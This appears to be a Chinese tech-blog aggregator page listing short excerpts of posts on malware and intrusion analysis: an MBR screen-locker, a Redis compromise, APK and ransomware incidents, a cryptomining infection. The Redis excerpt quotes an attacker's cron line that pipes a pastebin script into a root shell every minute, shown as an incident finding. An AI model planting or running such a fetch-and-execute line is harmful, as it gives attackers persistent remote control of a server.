原文:记一次MBR锁机病毒分析

有一天,在机缘巧合之下我获得了一个锁机软件 是多巧合阿喂 ,然后兴高采烈的把它拖入了虚拟机里蹂躏 amp gt amp lt 。 很巧,软件有虚拟机检测。。。 Emmmm好吧,随便过一下。。。 我用的虚拟机是VMware ,网上查到了一段过检测的代码: isolation.tools.setVersion.disable amp quot TRUE amp quot isolation.tools ...

2017-12-07 18:17 0 1081 推荐指数:

查看详情

一次redis病毒分析笔记

起因 偶然间发现redis里有一个陌生key:tightsoft,它的值是:*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道这肯定不是我们存的,再看value我警觉了,这是要定时执行脚本啊。 分析 ...

Wed Sep 05 23:13:00 CST 2018 2 944
一次简单的分析APK病毒木马

写个笔记记录一下,起因是朋友在QQ上发了个连接叫我看看 安不安全,叫我帮他看看,反正在店里待着也没生意,那就顺便看看咯。 打开这个网址 会自动弹出下载一个名为OOXX的APK安装包。 ...

Fri Jan 08 00:43:00 CST 2016 1 5283
一次病毒分析之旅

0x00 前言 这个病毒应该是比较简单的,别人给我的样本,让我帮忙看看,看样子是很早的一个病毒,针对Windows XP系统的,行为分析很简单,但是想着不能就仅仅分析关键点,要不就把整个结构给逆向出来,弄了两天,搞的差不多了,简单的记录一下。 0x01 基本介绍 整个病毒是4个文件组成 ...

Tue Jan 05 04:58:00 CST 2016 17 4101
一次部署Hadoop后遭受kthreaddi挖矿病毒

云服务器在部署Hadoop后便被黑了,查看进程发现了kthreaddi占满了CPU。 kill掉这个进程后还会自己重启,猜测是设置了定时启动任务。 查看定时器,查看定时器中的文件,发现文件不存在 ...

Sat May 08 23:59:00 CST 2021 0 1526
一次亲身体验的勒索病毒事件 StopV2勒索病毒

昨天给笔记本装了 windows server 2016 操作系统,配置的差不多之后,想使用注册激活系统。使用了几个本地以前下载的注册激活失败后,尝试上网搜索。 于是找到下面这个网站(这个网站下载的注册是勒索病毒,千万不要在这里下载) 下载的注册机运行后,电脑自带 ...

Thu Feb 27 07:32:00 CST 2020 2 5370
一次华为

介绍 华为试分为 3 题,两题 100 分,一题 200 分,压线 150 分算你过,时间150分钟,支持多语言环境(牛客网),考试时需全程打开摄像头,电脑屏幕分享,手打开某小程序(可用计算器)不退出,可用本地 IDE, 会有一些测试题给你熟悉环境预热的。 备注: 由于脑容量有限,题目具体 ...

Fri Mar 05 02:11:00 CST 2021 0 558
一次针对Centos的入侵分析

离开厂家多年,很久没有碰这类事件了。 回顾:  2017年9月末,接到一个朋友转述的求助信息。他一客户的服务器被黑了。服务器上所跑业务上的金额也全部被人转走了。 朋友的客户加我后,没头没尾 ...

Thu Oct 05 23:59:00 CST 2017 0 1761
一次Java的内存泄露分析

当前环境 jdk == 1.8 httpasyncclient == 4.1.3 代码地址 git 地址:https://github.com/jasonGeng88/java-n ...

Sat Oct 07 00:23:00 CST 2017 1 4134
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM